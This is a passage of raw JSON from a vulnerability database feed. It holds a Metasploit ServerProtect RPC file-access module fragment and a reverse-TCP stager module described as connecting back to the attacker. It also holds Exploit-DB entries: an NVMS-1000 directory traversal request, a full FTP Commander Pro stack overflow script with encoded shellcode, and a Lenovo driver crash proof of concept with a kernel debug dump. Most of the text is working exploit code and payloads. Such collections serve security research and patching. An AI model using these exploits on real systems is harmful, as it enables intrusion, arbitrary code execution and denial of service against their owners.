serverprotect_readfile(handle)\n data = \"\\0\" * 4104\n data[0, 4] = [handle].pack('V')\n\n resp = serverprotect_rpccmd(131075, data, 4104)\n return if not resp\n\n if (resp.length != 4112)\n print_error(\"An unknown error occurred while calling ReadFile.\")\n return ''\n else\n ret, = resp[4108,4].unpack('V')\n\n if ret != 0\n print_error(\"An error occurred while calling CreateFile: #{ret}.\")\n return ''\n else\n br, = resp[4104, 4].unpack('V')\n return resp[8, br]\n end\n end\n end\n\n\n def serverprotect_writefile(handle, buf)\n data = \"\\0\" * 4104\n data[0, 4] = [handle].pack('V')\n data[4, buf.length] = buf\n data[4100, 4] = 
[buf.length].pack('V')\n\n resp = serverprotect_rpccmd(131076, data, 4104)\n return if not resp\n\n if (resp.length != 4112)\n print_error(\"An unknown error occurred while calling WriteFile.\")\n return 0\n else\n ret, = resp[4108,4].unpack('V')\n\n if ret != 0\n print_error(\"An error occurred while calling WriteFile: #{ret}.\")\n return 0\n end\n end\n\n return 1\n end\n\n\n def serverprotect_closehandle(handle)\n data = [handle].pack('V')\n\n resp = serverprotect_rpccmd(131074, data, 4)\n return if not resp\n\n if (resp.length != 12)\n print_error(\"An unknown error occurred while calling CloseHandle.\")\n else\n ret, = resp[8,4].unpack('V')\n\n if ret != 0\n print_error(\"An error occurred while calling CloseHandle: #{ret}.\")\n end\n end\n end\n\n\n def serverprotect_rpccmd(cmd, data, osize)\n if (data.length.remainder(4) != 0)\n padding = \"\\0\" * (4 - (data.length.remainder(4)))\n else\n padding = \"\"\n end\n\n stub =\n NDR.long(cmd) +\n NDR.long(data.length) +\n data +\n padding +\n NDR.long(data.length) +\n NDR.long(osize)\n\n return serverprotect_rpc_call(0, stub)\n end\n\n #\n # Call the serverprotect RPC service\n #\n def serverprotect_rpc_call(opnum, data = '')\n\n begin\n\n connect\n\n handle = dcerpc_handle(\n '25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0',\n 'ncacn_ip_tcp', [datastore['RPORT']]\n )\n\n dcerpc_bind(handle)\n\n resp = dcerpc.call(opnum, data)\n outp = ''\n\n if (dcerpc.last_response and dcerpc.last_response.stub_data)\n outp = dcerpc.last_response.stub_data\n end\n\n disconnect\n\n outp\n\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Error: #{e}\")\n nil\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-22T05:30:29", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 38}], "viewCount": 13, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": 
"2019-11-22T07:32:45"}, "dependencies": {"references": [{"type": "vulnerlab", "idList": ["VULNERLAB:2187"]}, {"type": "kitploit", "idList": ["KITPLOIT:2423308827989438502", "KITPLOIT:7044561031766565764"]}, {"type": "threatpost", "idList": ["THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:E00DA222DAC876747F9911778DDC997F", "THREATPOST:B9A717DA93642284A9408C7A11D5714E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A945F3BF130B3EBF81C9BAB217460EB7"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:06ED86BC5FE8565621F6AE9C50A76CB4"]}, {"type": "mskb", "idList": ["KB4474419", "KB4484127", "KB4484113", "KB4490628", "KB4484144"]}, {"type": "nessus", "idList": ["SOLR_8_2_0.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47702", "EDB-ID:47704"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155433", "PACKETSTORM:155428", "PACKETSTORM:155422"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:92BAA97414824FCFD7415368441F952B"]}], "modified": "2019-11-22T07:32:45"}, "vulnersScore": -0.2}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => 
Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"exploitdb": [{"lastseen": "2019-12-13T09:22:30", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-13T00:00:00", "published": "2019-12-13T00:00:00", "id": "EDB-ID:47774", "href": "https://www.exploit-db.com/exploits/47774", "type": "exploitdb", "title": "NVMS 1000 - Directory Traversal", "sourceData": "# Title: NVMS-1000 - Directory Traversal\r\n# Date: 2019-12-12\r\n# Author: Numan T\u00fcrle\r\n# Vendor Homepage: http://en.tvt.net.cn/\r\n# Version : N/A\r\n# Software Link : http://en.tvt.net.cn/products/188.html\r\n\r\nPOC\r\n---------\r\n\r\nGET /../../../../../../../../../../../../windows/win.ini HTTP/1.1\r\nHost: 12.0.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\r\nConnection: close\r\n\r\nResponse\r\n---------\r\n\r\n; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47774"}, {"lastseen": "2019-12-13T09:22:30", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-13T00:00:00", "published": "2019-12-13T00:00:00", "id": "EDB-ID:47775", "href": "https://www.exploit-db.com/exploits/47775", "type": "exploitdb", "title": "FTP Commander Pro 8.03 - Local Stack Overflow", "sourceData": "# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow \r\n# Date: 2019-12-12\r\n# Exploit Author: boku\r\n# Discovered by: UN_NON\r\n# Original DoS: FTP Commander 8.02 - Overwrite (SEH) \r\n# Original DoS Link: https://www.exploit-db.com/exploits/37810\r\n# Software Vendor: http://www.internet-soft.com/\r\n# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe\r\n# Version: Version 8.03 & Version 8.02 (same exploit for both)\r\n# Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418)\r\n# Windows 10 
Education 1909 (32-bit; OS-build=18363.418)\r\n# Windows 10 Pro 1909 (32-bit; OS-build=18363.418)\r\n# Windows Vista Home Basic SP1 (6.0.6001 Build 6001)\r\n# Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600\r\n# Python Version: Python 2.7.16+\r\n\r\n# Recreate:\r\n# 1) Generate 'poc.txt' payload using python 2.7.x\r\n# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy\r\n# 3) Install & Open ftpCommander v8.03 (or v8.02)\r\n# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command\r\n# - A textbox will appear on the bottom of the right window\r\n# 5) Paste payload from generated txt file into textbox\r\n# 6) Click \"Do it\"\r\n# - The program will crash & calculator will open\r\n# Other Security Issue: \r\n# - The program's default install path is: C:\\\\cftp\\cftp.exe\r\n\r\n#!/usr/bin/python\r\n\r\nblt = '\\033[92m[\\033[0m+\\033[92m]\\033[0m ' # bash green success bullet\r\nerr = '\\033[91m[\\033[0m!\\033[91m]\\033[0m ' # bash red error bullet\r\n\r\ntry:\r\n # EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH\r\n nops='CGS[BOKU]J'*100 # 1000 nops that are ASCII friendly\r\n # EIP jump lands at the beginning of the buffer\r\n # Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode\r\n # msfvenom -p windows/exec CMD='calc' -b '\\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper\r\n #x86/alpha_upper succeeded with size 447 (iteration=0)\r\n shellcode = b\"\"\r\n shellcode += b\"\\x89\\xe7\\xda\\xd6\\xd9\\x77\\xf4\\x58\\x50\\x59\\x49\"\r\n shellcode += b\"\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\"\r\n shellcode += b\"\\x56\\x54\\x58\\x33\\x30\\x56\\x58\\x34\\x41\\x50\\x30\"\r\n shellcode += b\"\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42\\x41\"\r\n shellcode += b\"\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\r\n shellcode += b\"\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\"\r\n 
shellcode += b\"\\x49\\x4b\\x4c\\x4a\\x48\\x4d\\x52\\x35\\x50\\x35\\x50\"\r\n shellcode += b\"\\x33\\x30\\x53\\x50\\x4c\\x49\\x4d\\x35\\x50\\x31\\x39\"\r\n shellcode += b\"\\x50\\x52\\x44\\x4c\\x4b\\x50\\x50\\x56\\x50\\x4c\\x4b\"\r\n shellcode += b\"\\x46\\x32\\x44\\x4c\\x4c\\x4b\\x31\\x42\\x42\\x34\\x4c\"\r\n shellcode += b\"\\x4b\\x42\\x52\\x46\\x48\\x34\\x4f\\x4f\\x47\\x51\\x5a\"\r\n shellcode += b\"\\x51\\x36\\x36\\x51\\x4b\\x4f\\x4e\\x4c\\x37\\x4c\\x33\"\r\n shellcode += b\"\\x51\\x33\\x4c\\x44\\x42\\x56\\x4c\\x57\\x50\\x4f\\x31\"\r\n shellcode += b\"\\x58\\x4f\\x54\\x4d\\x45\\x51\\x4f\\x37\\x5a\\x42\\x4b\"\r\n shellcode += b\"\\x42\\x36\\x32\\x30\\x57\\x4c\\x4b\\x51\\x42\\x34\\x50\"\r\n shellcode += b\"\\x4c\\x4b\\x50\\x4a\\x57\\x4c\\x4c\\x4b\\x30\\x4c\\x32\"\r\n shellcode += b\"\\x31\\x34\\x38\\x4b\\x53\\x57\\x38\\x43\\x31\\x4e\\x31\"\r\n shellcode += b\"\\x46\\x31\\x4c\\x4b\\x31\\x49\\x51\\x30\\x45\\x51\\x48\"\r\n shellcode += b\"\\x53\\x4c\\x4b\\x47\\x39\\x44\\x58\\x4b\\x53\\x37\\x4a\"\r\n shellcode += b\"\\x31\\x59\\x4c\\x4b\\x56\\x54\\x4c\\x4b\\x35\\x51\\x4e\"\r\n shellcode += b\"\\x36\\x50\\x31\\x4b\\x4f\\x4e\\x4c\\x39\\x51\\x38\\x4f\"\r\n shellcode += b\"\\x34\\x4d\\x45\\x51\\x59\\x57\\x30\\x38\\x4b\\x50\\x43\"\r\n shellcode += b\"\\x45\\x5a\\x56\\x55\\x53\\x33\\x4d\\x4a\\x58\\x57\\x4b\"\r\n shellcode += b\"\\x53\\x4d\\x31\\x34\\x54\\x35\\x4a\\x44\\x36\\x38\\x4c\"\r\n shellcode += b\"\\x4b\\x31\\x48\\x36\\x44\\x45\\x51\\x38\\x53\\x35\\x36\"\r\n shellcode += b\"\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x30\\x58\\x35\"\r\n shellcode += b\"\\x4c\\x53\\x31\\x49\\x43\\x4c\\x4b\\x44\\x44\\x4c\\x4b\"\r\n shellcode += b\"\\x55\\x51\\x38\\x50\\x4d\\x59\\x47\\x34\\x31\\x34\\x56\"\r\n shellcode += b\"\\x44\\x51\\x4b\\x51\\x4b\\x55\\x31\\x46\\x39\\x31\\x4a\"\r\n shellcode += b\"\\x30\\x51\\x4b\\x4f\\x4d\\x30\\x31\\x4f\\x31\\x4f\\x50\"\r\n shellcode += b\"\\x5a\\x4c\\x4b\\x42\\x32\\x4a\\x4b\\x4c\\x4d\\x31\\x4d\"\r\n shellcode += 
b\"\\x53\\x5a\\x33\\x31\\x4c\\x4d\\x4b\\x35\\x48\\x32\\x33\"\r\n shellcode += b\"\\x30\\x55\\x50\\x33\\x30\\x56\\x30\\x32\\x48\\x30\\x31\"\r\n shellcode += b\"\\x4c\\x4b\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x38\\x55\\x4f\"\r\n shellcode += b\"\\x4b\\x4c\\x30\\x4f\\x45\\x59\\x32\\x56\\x36\\x55\\x38\"\r\n shellcode += b\"\\x59\\x36\\x5a\\x35\\x4f\\x4d\\x4d\\x4d\\x4b\\x4f\\x59\"\r\n shellcode += b\"\\x45\\x37\\x4c\\x54\\x46\\x43\\x4c\\x54\\x4a\\x4d\\x50\"\r\n shellcode += b\"\\x4b\\x4b\\x4b\\x50\\x34\\x35\\x33\\x35\\x4f\\x4b\\x51\"\r\n shellcode += b\"\\x57\\x32\\x33\\x53\\x42\\x52\\x4f\\x42\\x4a\\x35\\x50\"\r\n shellcode += b\"\\x50\\x53\\x4b\\x4f\\x39\\x45\\x42\\x43\\x53\\x51\\x42\"\r\n shellcode += b\"\\x4c\\x32\\x43\\x53\\x30\\x41\\x41\"\r\n # Fill the rest of the space with B's until we are at our EIP offset\r\n offset = '\\x42'*(4108-len(nops+shellcode))\r\n # The EAX register holds a Pointer to the beginning of our buffer\r\n # FF20 = jmp [eax]\r\n # !mona find -o -s '\\xFF\\x20' \r\n # 0x0041081a : '\\xFF\\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe] \r\n # | ASLR: False; Rebase: False; SafeSEH: False; \r\n eip = '\\x1a\\x08\\x41' # 3 byte overwrite so we can set EIP to start with 0x00\r\n # After jmp [eax], we land at the beginning of our buffer\r\n payload = nops+shellcode+offset+eip\r\n File = 'poc.txt'\r\n f = open(File, 'w') # open file for write\r\n f.write(payload)\r\n f.close() # close the file\r\n print blt + File + \" created successfully \"\r\n\r\nexcept:\r\n print err + File + ' failed to create'", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47775"}, {"lastseen": "2019-12-12T11:23:11", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "EDB-ID:47771", "href": "https://www.exploit-db.com/exploits/47771", "type": "exploitdb", "title": "Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)", 
"sourceData": "# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)\r\n# Date: 2019-12-11\r\n# Exploit Author: Nassim Asrir\r\n# CVE: CVE-2019-6192\r\n# Tested On: Windows 10(64bit) | ThinkPad T470p\r\n# Vendor : https://www.lenovo.com/us/en/\r\n# Ref : https://support.lenovo.com/us/fr/solutions/len-29334\r\n\r\n# Description\r\n# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver\r\n# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes\r\n# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.\r\n\r\n# Exploit\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <conio.h>\r\n\r\nint main(int argc, char **argv)\r\n{\r\n HANDLE hDevice;\r\n DWORD bret;\r\n char szDevice[] = \"\\\\\\\\.\\\\pmdrvs\";\r\n\r\n printf(\"--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\\n\");\r\n\r\n printf(\"Opening handle to driver..\\n\");\r\n \r\n if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {\r\n printf(\"Device %s succesfully opened!\\n\", szDevice);\r\n printf(\"\\tHandle: %p\\n\", hDevice);\r\n }\r\n else\r\n {\r\n printf(\"Error: Error opening device %s\\n\", szDevice);\r\n }\r\n\r\n printf(\"\\nPress any key to DoS..\");\r\n _getch();\r\n\r\n bret = 0;\r\n \r\n if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))\r\n {\r\n printf(\"DeviceIoControl Error - bytes returned %#x\\n\", bret);\r\n }\r\n\r\n CloseHandle(hDevice);\r\n return 0;\r\n}\r\n\r\n\r\n# RCA\r\n\r\n2: kd> !analyze -v\r\n*******************************************************************************\r\n* *\r\n* Bugcheck Analysis *\r\n* *\r\n*******************************************************************************\r\n\r\nSYSTEM_SERVICE_EXCEPTION (3b)\r\nAn 
exception happened while executing a system service routine.\r\nArguments:\r\nArg1: 00000000c0000005, Exception code that caused the bugcheck\r\nArg2: fffff80428bf109d, Address of the instruction which caused the bugcheck\r\nArg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck\r\nArg4: 0000000000000000, zero.\r\n\r\nFAULTING_IP:\r\npmdrvs+109d\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\n\r\nCONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????\r\nResetting default scope\r\n\r\nCPU_COUNT: 8\r\n\r\nCPU_MHZ: af8\r\n\r\nCPU_VENDOR: GenuineIntel\r\n\r\nCPU_FAMILY: 6\r\n\r\nCPU_MODEL: 9e\r\n\r\nCPU_STEPPING: 9\r\n\r\nCPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init)\r\n\r\nBLACKBOXBSD: 1 (!blackboxbsd)\r\n\r\n\r\nBLACKBOXPNP: 1 (!blackboxpnp)\r\n\r\n\r\nCURRENT_IRQL: 0\r\n\r\nANALYSIS_SESSION_HOST: LAPTOP-SP\r\n\r\nANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485\r\n\r\nANALYSIS_VERSION: 10.0.17763.132 amd64fre\r\n\r\nLAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d\r\n\r\nSTACK_TEXT: \r\nffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d\r\nffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060\r\nffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 
00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59\r\nffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071\r\nffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc\r\nffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56\r\nffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925\r\n00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844\r\n\r\n\r\nTHREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68\r\n\r\nTHREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb\r\n\r\nTHREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b\r\n\r\nFOLLOWUP_IP:\r\npmdrvs+109d\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\n\r\nFAULT_INSTR_CODE: 8941078b\r\n\r\nSYMBOL_STACK_INDEX: 0\r\n\r\nFOLLOWUP_NAME: MachineOwner\r\n\r\nSTACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb\r\n\r\nBUGCHECK_STR: 2E8B5A19\r\n\r\nEXCEPTION_CODE_STR: 2E8B5A19\r\n\r\nEXCEPTION_STR: WRONG_SYMBOLS\r\n\r\nPROCESS_NAME: ntoskrnl.wrong.symbols.exe\r\n\r\nIMAGE_NAME: ntoskrnl.wrong.symbols.exe\r\n\r\nMODULE_NAME: nt_wrong_symbols\r\n\r\nSYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000\r\n\r\nBUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145\r\n\r\nDEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145\r\n\r\nPRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS\r\n\r\nFAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000\r\n\r\nTARGET_TIME: 2019-09-30T19:27:36.000Z\r\n\r\nOSBUILD: 17763\r\n\r\nOSSERVICEPACK: 
0\r\n\r\nSERVICEPACK_NUMBER: 0\r\n\r\nOS_REVISION: 0\r\n\r\nSUITE_MASK: 272\r\n\r\nPRODUCT_TYPE: 1\r\n\r\nOSPLATFORM_TYPE: x64\r\n\r\nOSNAME: Windows 10\r\n\r\nOSEDITION: Windows 10 WinNt TerminalServer SingleUserTS\r\n\r\nOS_LOCALE: \r\n\r\nUSER_LCID: 0\r\n\r\nOSBUILD_TIMESTAMP: 1994-09-30 01:21:45\r\n\r\nBUILDDATESTAMP_STR: 180914-1434\r\n\r\nBUILDLAB_STR: rs5_release\r\n\r\nBUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434\r\n\r\nANALYSIS_SESSION_ELAPSED_TIME: ae\r\n\r\nANALYSIS_SOURCE: KM\r\n\r\nFAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000\r\n\r\nFAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}\r\n\r\nFollowup: MachineOwner\r\n---------\r\n\r\n2: kd> u fffff804`28bf109d\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\nfffff804`28bf109f 41894308 mov dword ptr [r11+8],eax\r\nfffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000)\r\nfffff804`28bf10a8 85c0 test eax,eax\r\nfffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132)\r\nfffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h]\r\nfffff804`28bf10b8 4885c9 test rcx,rcx\r\nfffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132)\r\n2: kd> !for_each_frame .frame /r @$Frame\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!KeBugCheckEx:\r\nfffff804`1f269040 
48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09\r\n01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7f09:\r\nfffff804`1f27a8e9 90 nop\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c\r\n02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x735c:\r\nfffff804`1f279d3c b801000000 mov eax,1\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f\r\n03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei 
ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!_chkstk+0x41f:\r\nfffff804`1f271b4f 0f1f00 nop dword ptr [rax]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440\r\n04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!RtlUnwindEx+0x3440:\r\nfffff804`1f1ca460 8bd0 mov edx,eax\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264\r\n05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8ec50 